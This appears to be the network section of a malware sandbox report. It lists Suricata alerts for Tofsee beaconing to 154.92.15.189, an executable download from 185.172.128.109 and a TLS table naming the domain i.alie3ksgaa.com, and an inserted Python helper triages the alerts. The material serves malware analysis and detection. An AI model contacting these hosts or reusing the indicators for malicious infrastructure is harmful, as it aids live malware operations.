TCP 192.168.56.101:50305 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50280 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50311 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50282 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49374 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50320 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50288 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50321 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50293 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50324 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50299 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50325 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50301 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50329 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50302 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50331 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50315 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50333 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50316 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50335 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50322 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50352 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50346 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50371 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50217 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50377 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50219 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50353 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50379 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50221 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50355 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50225 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50356 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50227 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50360 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50238 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50366 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50051 -> 185.172.128.109:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 192.168.56.101:50051 -> 185.172.128.109:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:50240 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50378 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50268 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50380 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50273 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50381 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50383 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50278 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50386 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50283 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.172.128.109:80 -> 192.168.56.101:50051 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:50388 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.172.128.109:80 -> 192.168.56.101:50051 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:50284 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50389 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50298 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50303 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50310 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50314 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50332 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50336 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50338 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50342 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50351 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50359 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50362 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50368 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50369 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50374 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50382 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50385 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50146 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50149 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50154 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50164 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50166 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50181 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50182 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50185 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50186 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50200 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50204 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50214 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50222 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50229 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50231 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50234 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50243 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50261 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50263 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50271 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50274 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50285 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50289 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50292 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50294 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50306 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50308 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50312 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50317 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50326 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50327 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50330 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50344 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50345 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50347 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50350 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50358 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50361 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50364 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50372 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50373 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50375 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50376 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50391 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50392 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
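
The alert table above mixes several hundred repeated JA3 hits against one destination with a handful of single-flow events (the NSIS download and the MZ response on the same connection). The following triage helper is an added example, not part of the ZeroBOX report or its tooling: it parses rows in the flat layout shown above ("TCP src:port -> dst:port SID Signature Category"), groups them by remote endpoint and SID, and counts distinct guest-side ports so repeated beaconing and one-off events can be told apart. SAMPLE_ROWS are copied from the table above; GUEST_IP is the sandbox guest address used throughout this report. Signature text and category are kept together as one field, because the page separates them only by a space.

```python
"""Triage the flat Suricata alert rows of this report (added example)."""
import re
from collections import Counter, defaultdict

# Sandbox guest address used in this report; anything sent to it is a response.
GUEST_IP = "192.168.56.101"

ROW_RE = re.compile(
    r"^(?P<proto>TCP|UDP)\s+"
    r"(?P<src_ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<src_port>\d+)\s+->\s+"
    r"(?P<dst_ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<dst_port>\d+)\s+"
    r"(?P<sid>\d+)\s+(?P<msg>.+)$"
)

# Rows copied from the alert table above.
SAMPLE_ROWS = """\
TCP 192.168.56.101:50217 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50377 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50219 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50353 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:50051 -> 185.172.128.109:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 192.168.56.101:50051 -> 185.172.128.109:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:50240 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.172.128.109:80 -> 192.168.56.101:50051 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.109:80 -> 192.168.56.101:50051 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
"""


def parse_rows(text):
    """Parse alert rows; raise on a row that does not fit the layout."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            raise ValueError(f"unparsable alert row: {line!r}")
        row = m.groupdict()
        for key in ("src_port", "dst_port", "sid"):
            row[key] = int(row[key])
        alerts.append(row)
    return alerts


def summarize(alerts, guest_ip=GUEST_IP):
    """Group by (remote_ip, remote_port, sid).

    Returns {key: {"direction", "msg", "hits", "flows"}}, where "flows" is
    the number of distinct guest-side ports, i.e. distinct connections on
    which the rule fired.
    """
    hits, flows, meta = Counter(), defaultdict(set), {}
    for a in alerts:
        if a["src_ip"] == guest_ip:
            key = (a["dst_ip"], a["dst_port"], a["sid"])
            direction, guest_port = "outbound", a["src_port"]
        else:
            key = (a["src_ip"], a["src_port"], a["sid"])
            direction, guest_port = "inbound", a["dst_port"]
        hits[key] += 1
        flows[key].add(guest_port)
        meta[key] = (direction, a["msg"])
    return {
        key: {"direction": meta[key][0], "msg": meta[key][1],
              "hits": hits[key], "flows": len(flows[key])}
        for key in hits
    }


def remote_hosts(summary):
    """Total alert count per remote IP, most active first."""
    per_host = Counter()
    for (ip, _port, _sid), info in summary.items():
        per_host[ip] += info["hits"]
    return per_host.most_common()


if __name__ == "__main__":
    summary = summarize(parse_rows(SAMPLE_ROWS))
    for (ip, port, sid), info in sorted(summary.items(), key=lambda kv: -kv[1]["hits"]):
        print(f"{ip}:{port} sid={sid} {info['direction']:8} "
              f"hits={info['hits']} flows={info['flows']}  {info['msg']}")
    print(remote_hosts(summary))
```

Run against the full table, the same grouping shows one SID repeating over dozens of distinct guest ports toward 154.92.15.189:443, while all four rules for 185.172.128.109:80 sit on the single connection from port 50051.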

Suricata TLS

Version Flow Issuer Subject Fingerprint
TLSv1 192.168.56.101:49167 -> 154.92.15.189:443 C=US, O=Let's Encrypt, CN=R3 CN=i.alie3ksgaa.com e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.101:49179 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49188 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49182 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49175 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49196 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49213 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49201 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49240 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49202 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49440 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49178 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49208 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49788 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49185 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49235 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49914 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49186 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49292 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50018 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49187 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49482 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50048 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50144 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49189 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50159 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50151 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49192 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50165 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50153 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49198 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50168 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49172 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50170 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49174 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50171 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49177 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50174 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50167 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50175 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49173 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50172 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50179 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50183 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50196 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50188 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50202 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50207 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49190 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49176 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50209 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49205 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49200 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50213 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49207 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49203 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50230 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49221 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49211 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50237 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49474 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49291 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50244 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49609 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49180 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49311 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50256 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49851 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49542 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50026 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50265 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49184 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49735 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50203 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49199 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50052 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49183 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49204 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50145 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49209 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50148 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50155 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50275 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50156 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50276 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50277 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50211 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50281 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50212 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50295 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50220 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50296 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50224 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50300 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49220 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50228 -> 154.92.15.189:443 C=US, O=Let's Encrypt, CN=R3 CN=i.alie3ksgaa.com e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.101:49194 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49250 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50235 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49252 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50239 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49280 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50241 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49671 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50246 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49974 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50247 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50106 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50251 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50252 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50257 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50304 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50259 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50313 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50262 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50267 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50323 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50158 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50161 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50027 -> 154.92.15.189:443 C=US, O=Let's Encrypt, CN=R3 CN=i.alie3ksgaa.com e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.101:50269 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50339 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50152 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50291 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50340 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50157 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50297 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50341 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50160 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50162 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50307 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50169 -> 154.92.15.189:443 None None None
